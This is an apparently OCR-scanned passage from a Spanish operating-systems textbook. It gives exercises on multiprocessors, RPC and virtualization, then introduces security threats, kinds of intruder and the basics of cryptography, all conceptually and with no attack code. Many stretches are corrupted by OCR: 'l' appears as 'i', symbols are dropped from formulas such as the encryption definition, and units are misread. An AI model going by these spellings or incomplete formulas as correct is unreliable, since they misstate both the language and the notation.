clo de bus para transferirse, y el bus opera a 400 M Hz, ¿qué fracción se ocupa del ancho de banda 
del bus al mover el bloque de caché de un lado a otro? 

10. En el texto se sugirió utilizar un algoritmo de backoff exponencial binario entre los usos de tsl pa¬ 
ra sondear un bloqueo. También se sugirió tener un máximo retraso entre los sondeos. ¿Funcionaría 
correctamente el algoritmo si no hubiera un retraso máximo? 

11. Suponga que no está disponible la instrucción tsl para sincronizar un multi procesador. En su lugar 
se provee una instrucción swp para intercambiar de manera atómica el contenido de un registro con 
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una palabra en memoria. ¿Se podría utilizar esta instrucción para mantener la sincronización de 
los multiprocesadores? De ser así, ¿cómo se podría utilizar? En caso contrario, ¿por qué no funcio¬ 
naría? 

12. En este problema usted debe calcular cuánta carga en el bus impone un bloqueo de espera activa. 
Imagine que cada instrucción ejecutada por una CPU requiere 5 nseg. Al completarse una instruc¬ 
ción se llevan a cabo los ciclos necesarios (por ejemplo) para una instrucción tsl Cada ciclo de bus 
requiere 10 nseg adicionales antes y después del tiempo de ejecución de la instrucción. Si un proce¬ 
so intenta entrar a una región crítica mediante el uso de un ciclo de tsl, qué fracción del ancho de 
banda consume? Suponga que está funcionando la caché normal, por lo que al obtener una instruc¬ 
ción dentro del ciclo no se consumen ciclos de bus. 

13. Se dijo que la figura 8-12 describía un entorno de tiempo compartido. ¿Por qué sólo se muestra un 
proceso (A) en la parte (b)? 

14. La programación por afinidad reduce los fallos en la caché. ¿Reduce también los fallos de TLB? 
¿Qué hay sobre los fallos de página? 

15. Para cada una de las topologías de la figura 8-16, ¿cuál es el diámetro de la red de interconexión? 
C uente todos los saltos (host-enrutador y enrutador-enrutador) de igual forma para este problema. 

16. Considere la topología de doble anillo de la figura 8-16(d), pero expandida a un tamaño de k x k. 
¿Cuál es el diámetro de la red? Sugerencia: considere los valores impares de k y los valores pares 
de k de manera distinta. 

17. El ancho de banda de bisección de una red de interconexión se utiliza a menudo como una medida 
de su capacidad. Para calcularlo, se elimina un número mínimo de vínculos que dividen la red en 
dos unidades de igual tamaño. Después se suma la capacidad de los vínculos eliminados. Si hay mu¬ 
chas formas de realizar la división, la que obtenga el mínimo ancho de banda es el ancho de banda 
de bisección. Para una red de interconexión que consiste en un cubo de 8 x 8 x 8, ¿cuál es el an¬ 
cho de banda de bisección si cada vínculo es de 1 Gbps? 

18. Considere una multicomputadora en la que la interfaz de red está en modo de usuario, por lo que só¬ 
lo se necesitan tres copias de la RA M de origen a la RA M de destino. Suponga que para desplazar 
una palabra de 32 bits hacia/desde la tarjeta de interfaz de red se requieren 20 nseg, y que la red en 
sí opera a 1 Gbps. ¿Cuál sería el retraso por enviar un paquete de 64 bytes del origen al destino si 
pudiéramos ignorar el tiempo de copia? ¿Cuál sería el retraso con el tiempo de copia? Ahora consi¬ 
dere el caso en el que se necesitan dos copias adicionales, una que va al kernel del lado emisor y 
otra que proviene del kernel en el lado receptor. ¿Cuál es el retraso en este caso? 

19. Repita el problema anterior para el caso de tres copias y el caso de cinco copias, pero esta vez cal¬ 
cule el ancho de banda en vez del retraso. 

20. ¿Qué diferencias deben tener las implementaciones de send y neceive entre un sistema de 
multiprocesador con memoria compartida y una multicomputadora, y cómo afecta esto al rendi¬ 
miento? 

21. Al transferir datos de la RAM a una interfaz de red se puede marcar una página, pero suponga que 
las llamadas al sistema para marcar y desmarcar páginas requieren 1 pseg. El proceso de copia es 
de 5 bytes/nseg si se utiliza DMA, pero de 20 nseg por byte si se utiliza E/S programada. ¿Qué tan 
grande tiene que ser un paquete para que valga la pena marcar la página y usar DMA? 
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22. Cuando se recoge un procedimiento de una máquina y se coioca en otra para que sea iiamado me¬ 
diante RPC pueden ocurrir ciertos probiemas. En ei texto recaicamos cuatro de eiios: apuntadores, 
tamaños de arregios desconocidos, tipos de parámetros desconocidos y variabies giobaies. Una 
cuestión que no anaiizamos es io que ocurre si ei procedimiento (remoto) ejecuta una iiamada ai sis¬ 
tema. ¿Qué probiemas podría ocasionar esto y qué podríamos hacer para resoiverios? 

23. Cuando ocurre un faiio de página en un sistema de DSM , hay que iocaiizar ia página que se necesi¬ 
ta. Liste dos formas posibies de buscar ia página. 

24. Considere ia asignación de procesadores de ia figura 8-24. Suponga que ei proceso H se mueve dei 
nodo 2 ai nodo 3. ¿Cuái es ei peso totai dei tráfico externo ahora? 

25. A igunas muiticomputadoras permiten migrar ios procesos en ejecución de un nodo a otro. ¿Es sufi¬ 
ciente con detener un proceso, congeiar su imagen en memoria y sóio enviario a un nodo distinto? 
N ombre dos probiemas no triviaies que se tienen que resoiver para que esto funcione. 

26. Considere un hipervisor de tipo 1 que puede soportar hasta n máquinas virtuaies ai mismo tiempo. 
Las PCs pueden tener un máximo de cuatro particiones primarias de disco. ¿Puede n ser mayor que 
4? De ser así, ¿en dónde se pueden aimacenar ios datos? 

27. U na manera de manejar ios sistemas operativos invitados que modifican sus tabias de páginas me¬ 
diante ei uso de instrucciones ordinarias (no priviiegiadas) es marcar ias tabias de páginas como de 
sóio iectura, y tomar una interrupción cuando se modifiquen. ¿De qué otra forma se podrían mante¬ 
ner ias tabias de páginas ocuitas? Expiique ia eficiencia de su método en comparación con ias tabias 
de páginas de sóio iectura. 

28. V M ware reaiiza ia traducción binaria un bioque básico a ia vez, después ejecuta ei bioque y empie¬ 
za a traducir ei siguiente. ¿Podría traducir ei programa compieto por adeiantado y después ejecutar- 
io? De ser así, ¿cuáies son ias ventajas y desventajas de cada técnica? 

29. ¿Tiene sentido paravirtuaiizar un sistema operativo si está disponibieei código fuente? ¿Qué pasa si 
no i o está? 

30. Las PCs tienen pequeñas diferencias en ei nivei más inferior, como ia forma en que se administran 
ios temporizadores, ias interrupciones y aigunos de ios detaiies dei DMA. ¿Significan estas diferen¬ 
cias que ios dispositivos virtuaies en reaiidad no van a funcionar bien en ia práctica? Expiique su 
respuesta. 

31. ¿Por qué hay un iímite para ia iongitud de ios cabies en una red Ethernet? 

32. Para ejecutar varias máquinas virtuaies en una PC se requieren grandes cantidades de memoria. ¿Por 
qué? ¿Puede usted pensar en aiguna manera de reducir ei uso de ia memoria? Expiique. 

33. En ia figura 8-30, ios niveies tercero y cuarto se etiquetan como M iddiewarey Apiicación en ias cua¬ 
tro máquinas. ¿En qué sentido son iguaies entre una piataforma y otra, y en qué sentido son distintos? 

34. En ia figura 8-33 se iistan seis tipos distintos de servicio. Para cada una de ias siguientes apiicacio- 
nes, ¿qué tipo de servicio es ei más apropiado? 

(a) Video bajo demanda a través de Internet. 

(b) Descargar una página Web. 

35. Los nombres de DNS tienen una estructura jerárquica, como cs.uni.edu o ventas.generalwidget.com. 
U na manera de mantener la base de datos DNS sería como una base de datos centralizada, pero es- 
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to no se hace debido a que se obtendrían demasiadas peticiones por segundo. Proponga una mane¬ 
ra en que se pudiera mantener ia base de datos DNS en ia práctica. 

36. En ei anáiisis sobre ia forma en que un navegador procesa ios U RLs, se estabieció que ias conexio¬ 
nes se reai izan en ei puerto 80. ¿Por qué? 

37. Podría ser másfácii migrar máquinas virtuaies que procesos, pero ia migración de todas formas pue¬ 
de ser difícii. ¿Qué probiemas pueden surgir ai migrar una máquina virtuai? 

38. ¿Pueden ios URLs que se utiiizan en Web exhibir transparencia en ia ubicación? Expiique su res¬ 
puesta. 

39. Cuando un navegador obtiene una página Web, primero reaiiza una conexión TCP para obtener ei 
texto en ia página (en ei ienguaje HTM L). Después cierra ia conexión y examina ia página. Si hay 
figuras o iconos, entonces reaiiza una conexión TCP por separado para obtener cada figura o icono. 
Sugiera dos diseños aiternativos para mejorar ei rendimiento en este proceso. 

40. Cuando se utiiiza ia semántica de sesión, siempre es cierto que ias modificaciones a un archivo es¬ 
tán visibies de inmediato para ei proceso que reaiiza ei cambio, y nunca están visibies para ios pro¬ 
cesos en ias otras máquinas. Sin embargo, no se sabe si deben o no estar visibies de inmediato para 
ios otros procesos en ia misma máquina. Proporcione un argumento para cada uno de ios dos casos. 

41. Cuando varios procesos necesitan acceso a ios datos, ¿de qué manera es mejor ei acceso basado en 
objetos que ia memoria compartida? 

42. Cuando se reaiiza ia operación in de Linda para iocaiizar una tupia, es muy ineficiente buscar en to¬ 
do ei espacio de tupias en forma iineai. Diseñe una manera de organizar ei espacio de tupias para 
que se agiiicen ias búsquedas en todas ias operaciones in. 

43. Ei proceso de copiar búferes requiere tiempo. Escriba un programa en C para averiguar cuánto tiem¬ 
po se requiere en un sistema ai que usted tenga acceso. Use ias funciones dock o times para deter¬ 
minar cuánto tiempo se requiere para copiar un arregio extenso. Pruebe con tamaños distintos dei 
arregio para separar ei tiempo de copia dei tiempo de sobrecarga. 

44. Escriba funciones en C que se puedan utiiizar como resguardos de ciiente y servidor para reaiizar 
una iiamada RPC a ia función printf estándar, y un programa principai para evaiuar ias funciones. 
E i ciiente y ei servidor se deben comunicar mediante una estructura de datos que se pueda transmi¬ 
tir a través de una red. Puede imponer iímites razonabies en ia iongitud de ia cadena de formato y 
ei número, tipos y tamaños de ias variabies que aceptará su resguardo dei ciiente. 

45. Escriba dos programas para simuiar ei baianceo de carga en una muiticomputadora. Ei primer pro¬ 
grama debe estabiecer m procesos distribuidos entre n máquinas, de acuerdo con un archivo de ini- 
ciaiización. Cada proceso deberá tener un tiempo de ejecución eiegido ai azar, a partir de una 
distribución gaussiana cuya media y desviación estándar sean parámetros de ia simuiación. A i finai 
de cada ejecución, ei proceso crea cierto número de procesos nuevos, ios cuaies se seieccionan de 
una distribución de Poisson. Cuando un proceso termina, ia CPU debe decidir entre dar procesos a 
otras CPUs o tratar de buscar nuevos procesos. Ei primer programa debe utiiizar ei aigoritmo ini¬ 
ciado por ei servidor para dar trabajo a otras C PU s si tiene más de k procesos en totai en su máqui¬ 
na. Ei segundo programa debe utiiizar ei aigoritmo iniciado por ei receptor para obtener trabajo 
cuando sea necesario. Haga todas ias demás suposiciones razonabies que necesite, pero indíqueias 
con ciaridad. 
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46. Escriba un programa que implemente los algoritmos de balanceo de carga iniciado por el emisor e 
iniciado por el receptor que se analizan en la sección 8.2. Los algoritmos deben recibir como entra¬ 
da una lista de trabajos recién creados, especificados como (proceso_creador, tiempo_inicial, tiem- 
po_requerido_CPU), en donde el proceso_creador es el número de la CPU que creó el trabajo, el 
tiempo_inicial es el tiempo en el que se creó el trabajo y el tiempo_requerido_CPU es la cantidad 
de tiempo de la CPU que necesita el trabajo para completarse (especificado en segundos). Suponga 
que un nodo está sobrecargado cuando tiene un trabajo y se crea un segundo trabajo. Suponga que 
un nodo tiene poca carga cuando no tiene trabajos. Imprima el número de mensajes de sondeo en¬ 
viados por ambos algoritmos bajo cargas de trabajo pesada y ligera. Imprima también los números 
mínimo y máximo de sondas enviadas por cualquier host, y recibidas por cualquier host. Para crear 
las cargas de trabajo, escriba dos generadores de carga de trabajo. El primero debe simular una car¬ 
ga de trabajo pesada, que genere (en promedio) N trabajos cada Aj L segundos, en donde Aj L es la 
longitud de trabajo promedio y N es el número de procesadores. Las longitudes de los trabajos pue¬ 
den ser una mezcla de trabajos cortos y largos, pero la longitud de trabajo promedio debe ser Aj L. 
Los trabajos deben crearse (colocarse) al azar entre todos los procesadores. El segundo generador 
debe simular una carga ligera, que genere al azar (N/3) trabajos cada Aj L segundos.] ueguecon otras 
configuraciones de parámetros para los generadores de carga de trabajo y vea cómo afecta esto al 
número de mensajes de sonda. 

47. U na de las maneras más simples de implementar un sistema de publicar/suscribir es mediante un in¬ 
termediario centralizado que reciba los artículos publicados y los distribuya a los suscriptores apro¬ 
piados. Escriba una aplicación multihilo que emule un sistema de publicar/suscribir basado en 
intermediario. Los hilos publicador y suscriptor se pueden comunicar con el intermediario a través 
de la memoria (compartida). Cada mensaje debe empezar con una longitud de campo seguida de esa 
cantidad de caracteres. Los editores envían mensajes al intermediario, en los cuales la primera línea 
del mensaje contiene una línea de tema jerárquica separada por puntos, seguida de una o más líneas 
que componen el artículo publicado. Los suscriptores envían un mensaje al intermediario con una 
sola línea que contiene una línea de interés jerárquica, separada por puntos que expresan los artícu¬ 
los en los que están interesados. La línea de interés puede contener el símbolo comodín El in¬ 
termediario debe responder enviando todos los artículos (anteriores) que coincidan con el interés del 
suscriptor. Los artículos en el mensaje se separan mediante la línea "INICIO DE NU EVO ARTÍCU¬ 
LO". El suscriptor debe imprimir cada mensaje que reciba, junto con la identidad de su suscriptores 
(es decir, su línea de interés). El suscriptor debe seguir recibiendo los nuevos artículos que se publi¬ 
quen y coincidan con sus intereses. Se pueden crear hilos publicador y suscriptor de manera dinámi¬ 
ca desde la terminal, escribiendo la letra "P" o "S" (publicador o suscriptor) seguida de la línea de 
tema/interés jerárquica. Después los publicadores pedirán el artículo. Al escribir una sola línea que 
contenga"." se indicará el fin del artículo (este proyecto también se puede implementar mediante el 
uso de procesos que se comuniquen a través de TCP). 
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M uchas empresas poseen información vaiiosa que desean tener muy bien protegida. Esta informa¬ 
ción puede ser técnica (por ejempio, ei diseño de un nuevo chip o nuevo software), comerciai (por 
ejempio, estudios de ia competencia o pianes de marketing), financiera (por ejempio, pianes para 
una oferta de acciones), iegai (por ejempio, documentos sobre ia posibie fusión o absorción de una 
empresa), y de muchos otros ti pos. Con frecuencia, para proteger esta información se pone un guar¬ 
dia uniformado a ia entrada dei edificio, que asegura ia adecuada identificación de todo ei que en¬ 
tre. Asimismo, ios archiveros y ias oficinas se cierran con iiave para asegurar quesóio ias personas 
autorizadas tengan acceso a ia información. 

Además, ias computadoras domésticas contienen cada vez más datos vaiiosos. M uchas perso¬ 
nas mantienen su información financiera (como ias devoiuciones de impuestos y ios números de 
tarjetas de crédito) en su computadora. Las cartas de amor se han vueito digitaies. Y ios discos du¬ 
ros en estos tiempos están henos de fotografías, videos y peiícuias importantes. 

A medida queseaimacena cada vez más información de este tipo en ios sistemas computacio- 
naies, se vueive cada vez más importante ia necesidad de protegeria. Por io tanto, proteger esta in¬ 
formación contra ei uso no autorizado es una de ias principaies preocupaciones de todos ios 
sistemas operativos. Por desgracia, también es cada vez más difícii hacer esto debido a ia ampiia 
aceptación de ios sistemas infiados (y ios errores que ios acompañan) como un fenómeno normai. 
En ias siguientes secciones anaiizaremos una variedad de cuestiones reiacionadas con ia seguridad 
y ia protección; aigunas tienen anaiogías con ia protección reai de ia información en papei, pero 
otras son únicas para ios sistemas computacionaies. En estecapítuio examinaremos ia seguridad de 
ias computadoras apiicada a ios sistemas operativos. 
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Las cuestiones relacionadas con la seguridad délos sistemas operativos han cambiado de mane¬ 
ra radical en las últimas dos décadas. No fue sino hasta principios de la década de 1990 que algunas 
personas tenían una computadora en su casa, y la mayoría de los trabajos de cómputo se realizaban 
en empresas, universidades y otras organizaciones en computadoras multiusuario, desde grandes 
mainframes hasta minicomputadoras. Casi todas estas máquinas estaban aisladas, sin conexión a una 
red. Como consecuencia, la seguridad estaba enfocada casi por completo en la forma de evitar que 
los usuarios se entrometieran en los asuntos de los demás usuarios. Si Tracy y M arcia eran usuarios 
registrados de la misma computadora, el truco era asegurar que ninguna de las dos pudiera leer 
los archivos de la otra, o modificarlos, pero permitir que compartieran los archivos que querían com¬ 
partir. Se desarrollaron modelos y mecanismos elaborados para asegurar que ningún usuario pudie¬ 
ra obtener derechos de acceso a los archivos que no debía. 

A Igunas veces, los modelos y los mecanismos implicaban clases de usuarios en vez de sólo in¬ 
dividuos. Por ejemplo, en una computadora militar los datos tenían que marcarse como muy secre¬ 
tos, secretos, confidenciales o públicos, y había que evitar que los cabos husmearan en los directorios 
de los generales, sin importar quién era el cabo y quién era el general. Todos estos temas se investi¬ 
garon de manera detallada, se hicieron reportes sobre ellos y se implementaron durante varias dé¬ 
cadas. 

U na suposición tácita era que, una vez que se elegía el modelo y se realizaba la implementación, 
el software era básicamente correcto y cumpliría con todas las reglas. Por lo general, los modelos 
y el software eran bastante simples, por lo que la suposición casi siempre era válida. Por ende, si en 
teoría Tracy no tenía permitido ver cierto archivo de M arcia, en la práctica tampoco podía hacerlo. 

La situación cambió con el surgimiento de la computadora personal e Internet, y con la desa¬ 
parición de la mainframey las minicomputadoras compartidas (aunque no cambió por completo, ya 
que los servidores en las LANs corporativas son como las minicomputadoras compartidas). Por lo 
menos para los usuarios domésticos no había amenaza de que otro husmeara en sus archivos, ya que 
no había otras personas que usaran en esa computadora. 

Por desgracia, a medida que disminuyó esta amenaza surgió otra para ocupar su lugar (¿la ley 
de la conservación de las amenazas?): los ataques del exterior. Surgieron virus, gusanos y otras pla¬ 
gas digitales, entraron a las computadoras por medio de Internet y una vez establecidos, causaron 
todo tipo de estragos. Lo que los ayudó a hacer daño fue el explosivo crecimiento del bugware in¬ 
flado, que ha sustituido al formidable software eficiente de los años anteriores. A hora que los siste¬ 
mas operativos contienen 5 millones de líneas de código en el kernel y las aplicaciones de 100 M B 
son la regla en vez de la excepción, hay grandes cantidades de errores que las plagas digitales pue¬ 
den explotar para hacer cosas que las reglas no permiten. Por lo tanto, ahora tenemos una situación 
en la que podemos mostrar formalmente que un sistema es seguro, y aún así se puede ver compro¬ 
metido con facilidad debido a que cierto error en el código permite que un programa salvaje haga 
cosas que formalmente tiene prohibido hacer. 

Este capítulo consta de dos partes para cubrir todos los detalles. Empieza por analizar las ame¬ 
nazas con cierto detalle, para ver qué es lo que queremos proteger. Después, en la sección 9.2 se in¬ 
troduce la criptografía moderna, que es una herramienta básica e importante en el mundo de la 
seguridad. Después viene la sección 9.3, que trata sobre los modelos formales de seguridad y la for¬ 
ma de razonar sobre el acceso seguro y la protección entre los usuarios que tienen datos confiden¬ 
ciales, pero que también comparten datos con otros usuarios. 
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Hasta este punto todo va bien, luego entra en juego la realidad. Las siguientes cinco secciones 
tratan sobre problemas de seguridad prácticos que ocurren en la vida diaria. Pero para cerrar con 
una nota optimista, terminaremos el capítulo con secciones sobre defensas contra estas plagas del 
mundo real y un breve análisis sobre la investigación continua en la seguridad de las computado¬ 
ras, y por último un resumen. 

Lo que también vale la pena observar es que, aunque este libro trata sobre sistemas operativos, 
la seguridad de éstos y en la red son cuestiones tan entrelazadas que es realmente imposible sepa¬ 
rarlas. Por ejemplo, los virus entran por la red pero afectan al sistema operativo. En general, hemos 
preferido pecar de prudentes, por lo que incluimos cierto material que está vinculado al tema, aun¬ 
que en realidad no es una cuestión sobre sistemas operativos. 


9.1 EL ENTORNO DE SEGURIDAD 

Vamos a empezar nuestro estudio sobre la seguridad con la definición de cierta terminología. Al¬ 
gunas personas utilizan los términos "seguridad" y "protección" de manera indistinta. Sin embar¬ 
go, con frecuencia es útil distinguir los problemas generales involucrados en el proceso de evitar 
que personas no autorizadas lean o modifiquen los archivos, lo que por una parte incluye cuestio¬ 
nes técnicas, administrativas, legales y políticas, y por otra incluye los mecanismos específicos del 
sistema operativo para brindar seguridad. Para evitar una confusión, utilizaremos el término segu¬ 
ridad para hacer referencia al problema general, y mecanismos de protección para referirnos a 
los mecanismos específicos del sistema operativo que se utilizan para salvaguardar la información 
en la computadora. Sin embargo, no hay un límite definido entre estos dos términos. Primero estu¬ 
diaremos la seguridad para ver cuál es la naturaleza del problema. M ás adelante en el capítulo ana¬ 
lizaremos los mecanismos de protección y los modelos disponibles para ayudar a obtener 
seguridad. 

La seguridad tiene muchas facetas. Tres de las más importantes son la naturaleza de las ame¬ 
nazas, la naturaleza de los intrusos y la pérdida accidental de datos. A hora analizaremos cada una 
de estas facetas en orden. 


9.1.1 Amenazas 

Desde la perspectiva de la seguridad, en sistemas computacionales se tienen cuatro objetivos genera¬ 
les con sus correspondientes amenazas, como se muestra en la lista de la figura 9-1. El primer objeti¬ 
vo, conocido como confidencialidad de los datos, implica hacer que los datos secretos permanezcan 
así. Por ejemplo, si el propietario de ciertos datos ha decidido que éstos pueden estar disponibles só¬ 
lo para ciertas personas, el sistema debe garantizar que las personas no autorizadas nunca tengan 
acceso a esos datos. Como un mínimo absoluto, el propietario debe ser capaz de especificar quién 
puede ver qué cosa, y el sistema debe cumplir con estas especificaciones, que en teoría se deben 
aplicar a cada archivo en forma individual. 
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Objetivo 

Amenaza 

Confidencialidad de los datos 

Exposición de los datos 

Integridad de los datos 

Alteración de los datos 

Disponibilidad del sistema 

Negación del servicio 

Exclusión de los usuarios externos 

Los virus se apropian del sistema 


Figura 9-1. Objetivos y amenazas de seguridad. 

El segundo objetivo, conocido como integridad de ios datos, significa que los usuarios sin au¬ 
torización no deben ser capaces de modificar datos sin el permiso del propietario. La modificación de 
datos en este contexto incluye no sólo la modificación de los datos, sino también su eliminación y la 
inclusión de datos falsos. Si un sistema no puede garantizar que los datos depositados en él permane¬ 
cerán sin modificación hasta que el usuario decida hacerlo, no tiene mucho valor como sistema de in¬ 
formación. 

El tercer objetivo, conocido como disponibilidad del sistema, significa que nadie puede per¬ 
turbar el sistema para hacerlo inutilizable. Dichos ataques de negación del servicio son cada vez 
más comunes. Por ejemplo, si una computadora es un servidor de Internet y alguien le envía una 
avalancha de peticiones, puede dejarlo inhabilitado al ocupar todo el tiempo de su CPU con tan só¬ 
lo tener que examinar y descartar las peticiones entrantes. Si, por ejemplo, requiere 100 pseg para 
procesar una petición entrante para leer una página Web, entonces cualquiera que se las arregle pa¬ 
ra enviar 10,000 peticiones/segundo podrá aniquilarlo. Hay disponibles modelos razonables y tec¬ 
nología para lidiar con los ataques sobre la confidencialidad y la integridad: es mucho más difícil 
frustrar estos ataques de negación de servicio. 

Por último, en años recientes surgió una nueva amenaza. Algunas veces los usuarios externos 
pueden tomar el control de las computadoras en el hogar de otras personas (mediante el uso de vi¬ 
rus y otros medios) y convertirlas en zombies, dispuestas a cumplir los deseos del usuario exterior 
con sólo dar las órdenes. A menudo los zombies se utilizan para enviar spam, de manera que no se 
pueda rastrear el cerebro que está detrás del ataque de spam. 

En cierto sentido también existe otra amenaza, pero es más una amenaza para la sociedad que 
para los usuarios individuales. Hay quienes le tiene rencor a cierto país específico o grupo (étnico), 
o que sólo están enojados con el mundo en general y desean destruir toda la infraestructura que pue¬ 
dan sin importar la naturaleza de los daños o quiénes sean las víctimas específicas. Por lo general, 
dichas personas sienten que es bueno atacar a las computadoras de sus enemigos, pero los ataques 
en sí tal vez no estén bien enfocados. 

Otro aspecto del problema de seguridad es la privacidad: proteger a los individuos contra el 
mal uso de la información sobre ellos. Esto está generando muchos problemas legales y morales. 
¿Debe el gobierno compilar expedientes de todas las personas para poder atrapar a los que engañan 
a X, donde X es "asistencia social" o "impuestos", dependiendo de sus intereses políticos? ¿Debe 
ser capaz la policía de buscar cualquier información sobre cualquier persona para poder detener al 
crimen organizado? ¿Los patrones y las compañías de seguros tienen derechos? ¿Qué ocurre cuan¬ 
do estos derechos entran en conflicto con los derechos individuales? Todas estas cuestiones son 
muy importantes, pero están más allá del alcance de este libro. 
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9.1.2 Intrusos 

Como la mayoría de las personas son buenas y obedecen la ley, ¿para qué preocuparnos por la se¬ 
guridad? Por desgracia, hay unas cuantas personas por ahí que no son tan buenas y quieren ocasio¬ 
nar probiemas (posibiemente para obtener su propia ganancia comerciai). En ia iiteratura de ia 
seguridad, ias personas que husmean en iugares en donde no tienen por qué hacerio se conocen co¬ 
mo intrusos, o aigunas veces como adversarios. Los intrusos actúan en dos formas distintas. Los 
intrusos pasivos sóio quieren ieer archivos para ios cuaies no tienen autorización. Los intrusos ac¬ 
tivos son más maiiciosos; desean reaiizar modificaciones no autorizadas a ios datos. Ai diseñar un 
sistema para quesea seguro contra ios intrusos, es importante tener en cuenta ei tipo de intruso con¬ 
tra ei que tratamos de protegerio. A igunas categorías comunes son: 

1. Usuarios no técnicos que se entrometen en forma casuai. M uchas personas tienen compu¬ 
tadoras personaies en sus escritorios, ias cuaies están conectadas a un servidor de archi¬ 
vos compartidos y, debido a ia naturaieza curiosa de ios humanos, aigunas de esas 
personas son capaces de ieer ei correo eiectrónico y demás archivos de otras si no hay ba¬ 
rreras que ias detengan. Por ejempio, ia mayoría de ios usuarios de UNIX tienen ia op¬ 
ción predeterminada de que todos ios archivos recién creados tienen permisos de iectura 
para todos. 

2. Intrusos que husmean. Los estudiantes, programadores de sistemas, operadores y demás 
personai técnico a menudo consideran como un reto personai ia acción de irrumpir en ia se¬ 
guridad de un sistema computacionai iocai. Por io generai son muy habiiidososy están dis¬ 
puestos a dedicar una cantidad considerabie de tiempo a eiio. 

3. Intentos determinados por obtener dinero. Aigunos programadores de ios bancos han trata¬ 
do de robar dei banco en ei que trabajan. Los esquemas varían, desde cambiar ei software 
para truncar en vez de redondear ei interés, quedarse con ia fracción de un centavo, desviar 
ias cuentas que no se han utiiizado en años, hasta iiegar ai chantaje ("Si no me pagan, des¬ 
truiré todos ios registros dei banco"). 

4. Espionaje comerciai omiiitar. Ei espionaje se refiere a un intento serio y bien fundamenta¬ 
do por parte de un competidor u otro país de robar programas, secretos comerciai es, ideas 
patentabies, tecnoiogía, diseños de circuitos, pianes de negocios, etcétera. A menudo para 
hacer esto se intervienen iíneas teiefónicas o inciuso se montan antenas dirigidas hacia ia 
computadora para recoger su radiación eiectromagnética. 

Hay que dejar en ciaro que tratar de evitar que un gobierno extranjero hostii robe secretos miiitares 
es aigo muy distinto a tratar de evitar que ios estudiantes inserten diario un mensaje gracioso en ei 
sistema. La cantidad de esfuerzo necesaria para ia seguridad y ia protección depende sin duda de 
quién creamos que es ei enemigo. 

Ei virus es otra categoría de piaga de seguridad que se ha manifestado en años recientes, y dei 
cuai habiaremos con detaiie más adeiante en este capítuio. En esencia, un virus es una pieza de 
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código que se duplica a sí mismo y (por lo general) realiza cierto daño. En cierto modo, el escritor 
de un virus es también un intruso, a menudo con habilidades técnicas elevadas. La diferencia entre 
un intruso convencional y un virus es que el primero se refiere a una persona que trata de irrumpir 
en un sistema por motivos personales para ocasionar daños, mientras que el segundo es un progra¬ 
ma escrito por dicha persona y que después se suelta en el mundo con la esperanza de que provo¬ 
que daños. Los intrusos tratan de irrumpir en sistemas específicos (por ejemplo, uno que pertenezca 
a cierto banco o al Pentágono) para robar o destruir datos específicos, mientras que el escritor de 
un virus comúnmente quiere provocar daños en general, y no le importa a quién. 


9.1.3 Pérdida accidental de datos 

Además de las amenazas ocasionadas por los intrusos maliciosos, por accidente se pueden perder 
datos valiosos. A Igunas de las causas comunes de pérdida accidental de datos son: 

1. Accidentes y desastres naturales: incendios, inundaciones, terremotos, guerras, disturbios o 
ratas que roen cintas magnéticas. 

2. Errores de hardware o software: fallas en la CPU, discos o cintas que no se pueden leer, 
errores de telecomunicaciones, errores en los programas. 

3. Errores humanos: error al introducir los datos, al montar una cinta o un CD-ROM de mane¬ 
ra incorrecta: ejecutar el programa incorrecto, perder un disco o una cinta, o cualquier otro 
error. 

La mayoría de estas causas se pueden prevenir mediante la realización de respaldos adecuados que 
se guardan, de preferencia, lejos délos datos originales. A unque la acción de proteger los datos con¬ 
tra pérdidas accidentales puede parecer mundana en comparación con la acción de proteger contra 
intrusos astutos, en la práctica es probable que haya más daños ocasionados por las pérdidas acci¬ 
dentales que por intrusos. 


9.2 FUNDAMENTOS DE LA CRIPTOGRAFÍA (CIFRADO) 

La criptografía desempeña un importante papel en la seguridad. M uchas personas están familiari¬ 
zadas con los criptogramas de los periódicos, que son pequeños rompecabezas en donde cada letra 
se ha sustituido de manera sistemática por una letra distinta. En realidad no tienen mucho que ver 
con la criptografía moderna. En esta sección daremos un vistazo a la criptografía en la era de las 
computadoras, parte de lo cual será útil para comprender el resto de este capítulo. Además, cual¬ 
quiera que esté preocupado por la seguridad debe conocer por lo menos los fundamentos. Sin em¬ 
bargo, un análisis detallado de la criptografía es un tema más allá del alcance de este libro. Hay 
muchos libros excelentes sobre seguridad en las computadoras que analizan este tema con mucho 
detalle. El lector interesado puede consultar estos libros (por ejemplo, Kaufman y colaboradores. 
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2002; Pfleeger y Pfleeger, 2006). A continuación veremos un anáiisis muy breve sobre ia criptogra¬ 
fía para aqueiios iectores que no estén famiiiarizados con eiia. 

Ei propósito de ia criptografía es tomar un mensaje o archivo, conocido como texto simple, y 
convertido en texto cifrado de tai forma quesóio ias personas autorizadas sepan cómo convertido 
nuevamente en texto simpie. Para todos ios demás, ei texto cifrado es sóio una sucesión incompren- 
sibie de bits. A unque pueda parecer extraño para ios principiantes en esta área, ios aigoritmos de ci¬ 
frado y descifrado (funciones) siempre deben ser púbiicos. Casi nunca se pueden mantener secretos, 
y esto da a ias personas que tratan de mantener ios secretos una faisa sensación de seguridad. En ia 
práctica, esta táctica se conoce como seguridad por oscuridad y ia empiean sóio ios amateurs en 
ia seguridad. Lo extraño es que ia categoría de amateurs también inciuye a muchas empresas mui- 
tinacionaies que en reaiidad deberían estar mejor informadas. 

En vez de eiio, ei secreto depende de ios parámetros de ios aigoritmos, a ios cuaies se Íes de¬ 
nomina claves. Si P es ei archivo de texto simpie, es ia ciave de cifrado, C es ei texto cifrado y 
E es ei aigoritmo de cifrado (es decir, ia función), entonces C = E ( P, ). Ésta es ia definición 
dei cifrado, ia cuai indica que ei texto cifrado se obtiene mediante ei uso dei aigoritmo de cifrado 
E, con ei texto simpie P y ia ciave de cifrado (secreta) como parámetros. La idea de que todos 
ios aigoritmos deben ser púbiicos y ei secreto debe residir exciusivamente en ias ciaves se conoce 
como Principio de Kerckhoffs, formuiado por ei criptógrafo hoiandés Auguste Kerckhoffs dei si- 
gio XIX. En ia actuaiidad, todos ios criptógrafos serios han adoptado esta idea. 

De manera simiiar tenemos que P = D (C, Kp), donde D esei aigoritmo de descifrado y Kp es 
i a ciave de descifrado. Esto indica que para obtener de vueita ei texto simpie P a partir dei texto ci¬ 
frado C y ia ciave de descifrado Kp, hay que ejecutar ei aigoritmo D con C y Kp como parámetros. 
En ia figura 9-2 se muestra ia reiación entre ias diversas piezas. 



Cifrado 


V" 

Descifrado 


Figura 9-2. Relación entre el texto simple y el texto cifrado. 


9.2.1 C riptografía de clave secreta 

